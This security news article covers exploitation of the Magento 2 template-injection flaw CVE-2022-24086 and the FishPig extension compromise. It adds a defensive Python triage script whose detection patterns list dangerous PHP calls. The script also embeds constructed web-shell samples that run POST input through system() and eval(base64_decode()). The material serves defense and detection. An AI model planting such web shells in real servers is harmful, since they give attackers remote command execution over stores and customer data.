Cyber criminals are increasingly attempting to exploit a critical template-injection vulnerability in Magento 2 to run arbitrary code on unpatched stores.
That is the warning from eCommerce malware detection service Sansec, whose researchers say they have recently observed a surge in exploitation attempts against CVE-2022-24086.
Magento, which Adobe acquired in 2018, is one of the most popular ecommerce platforms in the world. It is offered both as the free Magento Open Source edition and as the commercial Adobe Commerce edition.
The Magento Marketplace is used by thousands of merchants and developers to buy, sell and download themes and extensions for Magento-based online stores. That popularity also makes the platform a constant target for cyber criminals.
CVE-2022-24086 was disclosed in February 2022, when Adobe reported that it was already being exploited in the wild in "very limited attacks".
The bug carries a CVSS score of 9.8 out of 10, and Adobe shipped an emergency out-of-band patch (security bulletin APSB22-12) alongside the disclosure.
Adobe advised admins of stores running Adobe Commerce or Magento Open Source 2.4.3-p1 / 2.3.7-p2 and earlier (2.3.3 and earlier are not affected) to treat CVE-2022-24086 as a priority and apply the patches as soon as possible.
CVE-2022-24086 is described as an "improper input validation vulnerability during the checkout process": shopper-supplied checkout data reaches Magento's template engine and is evaluated rather than treated as text. It requires no authentication and no user interaction, and a successful attack gives the attacker arbitrary code execution on the store's server.
Security researchers published a proof-of-concept (PoC) exploit for CVE-2022-24086 within days of the disclosure, paving the way for widespread exploitation. Adobe's first patch also proved incomplete: a bypass, tracked as CVE-2022-24087, was fixed in a follow-up patch on 17 February 2022, so stores need both fixes applied.
Sansec researchers now report three distinct template-injection variants that exploit CVE-2022-24086 to plant a Remote Access Trojan (RAT) or a PHP backdoor on vulnerable stores.
All of the detected attacks were interactive, the researchers say, possibly because Magento's multi-step checkout sequence is hard to automate.
The three attack variants
The first variant creates a new customer account on the target store with template code embedded in its fields, then places an order, which may end in a failed payment.
When the template is rendered, the injected code decodes into a shell command that downloads a Linux executable disguised as 223sam.jpg and launches it as a background process.
According to the researchers, the file is a memory-resident Remote Access Trojan (RAT) that polls a command-and-control server in Bulgaria for further instructions.
Running in the same context as the PHP application, the RAT has full access to both the store database and the active PHP processes.
The second variant injects the template code into the VAT field of the placed order and uses it to drop a health_check.php backdoor, a name that blends in with the legitimate pub/health_check.php that ships with Magento 2.
The template code writes this new PHP file to disk; the file then accepts further commands via POST requests.
The third variant uses the template code to overwrite generated/code/Magento/Framework/App/FrontController/Interceptor.php, a file normally produced by Magento's code generator, with malicious code.
Because the front controller interceptor is invoked on every Magento page request, the malware runs every time a page is served.
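The three variants leave artefacts a store owner can look for: template directives such as {{var ...}} sitting in shopper-controlled checkout fields (the injection point itself), a health_check.php that reads POST input, and a generated Interceptor.php that contains code the generator never emits. The following triage script is an added example, not Sansec's tooling or Adobe's code. Its directive list is Magento 2's template directive set; the file locations, the sample order records and the "tampered" file contents written by run_demo() are constructed for the demo; and the tampering heuristic assumes, as is the case for a stock Magento 2 install, that neither a generated interceptor nor the shipped pub/health_check.php calls eval/system/base64_decode or reads $_POST.

```python
"""Triage helper for the CVE-2022-24086 attack patterns described above.

Added example (not Sansec's or Adobe's code). Two checks:
  1. scan_checkout_fields() flags field values carrying a Magento template
     directive ({{var ...}}, {{block ...}}, ...). A name, street or VAT id
     never legitimately contains one.
  2. scan_indicators() inspects the artefacts named in the report, the
     health_check.php backdoor and the generated Interceptor.php, for PHP
     that neither legitimate file contains (eval, system, $_POST reads...).
The sample records and the files written by run_demo() are constructed.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Magento's template filter resolves {{directive ...}} tokens; a directive in a
# shopper-controlled field is the injection point for this CVE.
DIRECTIVE_RE = re.compile(
    r"\{\{\s*(var|block|template|depend|if|trans|widget|layout|css|inlinecss"
    r"|media|store|view|protocol|config|customvar)\b[^}]*\}\}",
    re.IGNORECASE,
)

# Checkout fields a shopper controls (the report names the customer account
# and the VAT field; the others are the usual address fields).
CHECKOUT_FIELDS = ("firstname", "lastname", "company", "street", "city",
                   "telephone", "vat_id")

# Calls that appear in neither a generated interceptor nor the stock
# pub/health_check.php; any hit means the file was replaced or tampered with.
TAMPER_RE = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|str_rot13|system|shell_exec"
    r"|passthru|exec|popen|proc_open|file_put_contents|curl_exec)\s*\(",
    re.IGNORECASE,
)
# The report says the backdoor takes commands via POST; neither legitimate
# file reads request input at all.
INPUT_RE = re.compile(r"\$_(?:POST|REQUEST)\b|php://input")

INTERCEPTOR_REL = "generated/code/Magento/Framework/App/FrontController/Interceptor.php"
BACKDOOR_CANDIDATES = ("health_check.php", "pub/health_check.php")  # assumed locations


def scan_checkout_fields(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per field value that carries a template directive."""
    hits = []
    for rec in records:
        for field in CHECKOUT_FIELDS:
            match = DIRECTIVE_RE.search(rec.get(field) or "")
            if match:
                hits.append({"order_id": rec.get("order_id", "?"),
                             "field": field, "directive": match.group(0)})
    return hits


def suspicious_tokens(php_source: str) -> List[str]:
    """Names of dangerous calls and request-input reads found in PHP source."""
    tokens = [m.group(1) for m in TAMPER_RE.finditer(php_source)]
    tokens += [m.group(0) for m in INPUT_RE.finditer(php_source)]
    return tokens


def scan_indicators(magento_root: str) -> List[Tuple[str, str]]:
    """(relative path, token) for every suspicious token in the indicator files."""
    findings = []
    for rel in BACKDOOR_CANDIDATES + (INTERCEPTOR_REL,):
        path = os.path.join(magento_root, rel)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            for token in suspicious_tokens(fh.read()):
                findings.append((rel, token))
    return findings


# Constructed sample: order 1002 carries a (harmless) directive in the VAT field.
SAMPLE_RECORDS = [
    {"order_id": "1001", "firstname": "Ana", "street": "Main St 1", "vat_id": "DE123456789"},
    {"order_id": "1002", "firstname": "Bob", "street": "High St 2",
     "vat_id": "{{var order.getIncrementId()}}"},
]

TAMPERED_INTERCEPTOR = """<?php
namespace Magento\\Framework\\App\\FrontController;
class Interceptor extends \\Magento\\Framework\\App\\FrontController
{
    // constructed tampering; a generated interceptor only dispatches plugins
    public function dispatch($request)
    {
        eval(base64_decode($_POST['c'] ?? ''));
        return parent::dispatch($request);
    }
}
"""
BACKDOOR = "<?php\n// constructed backdoor body; the stock health check reads no request input\nsystem($_POST['cmd']);\n"


def run_demo() -> Tuple[List[Dict[str, str]], List[Tuple[str, str]]]:
    """Write the constructed artefacts into a temp tree and run both scans."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, os.path.dirname(INTERCEPTOR_REL)))
        os.makedirs(os.path.join(root, "pub"))
        with open(os.path.join(root, INTERCEPTOR_REL), "w") as fh:
            fh.write(TAMPERED_INTERCEPTOR)
        with open(os.path.join(root, "pub", "health_check.php"), "w") as fh:
            fh.write(BACKDOOR)
        return scan_checkout_fields(SAMPLE_RECORDS), scan_indicators(root)


if __name__ == "__main__":
    field_hits, file_hits = run_demo()
    for hit in field_hits:
        print(f"order {hit['order_id']}: directive in {hit['field']}: {hit['directive']}")
    for rel, token in file_hits:
        print(f"{rel}: suspicious token {token}")
```

On a real store the records would come from the customer_entity and sales_order_address tables and scan_indicators() would be pointed at the Magento install root. A hit from scan_checkout_fields() is evidence of an attempt, whether or not it succeeded; a hit from scan_indicators() means the server should be treated as compromised rather than merely patched, since the RAT from the first variant lives in memory and leaves no file for this check to find.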
To protect their stores, the researchers advise Magento 2 admins to upgrade to the latest release. Stores that were exposed during the exploitation window should also be checked for the backdoor files and the memory-resident RAT described above, since patching alone does not remove an implant that is already in place.
The FishPig attack
The announcement comes days after Sansec researchers warned that cybercriminals had been planting malware on online retailers' servers after breaking into the server infrastructure of FishPig.
FishPig develops Magento-WordPress integration software and counts more than 200,000 downloads of its extensions.
Sansec said the attackers injected malware into the FishPig Magento Security Suite and several other FishPig extensions for Magento 2, giving them access to stores that installed the trojanised builds. The injected code in turn installed Rekoobe, a Linux RAT that hides on the server as a background process.
Once activated, Rekoobe opens a reverse shell that lets the attacker remotely run commands on the compromised server.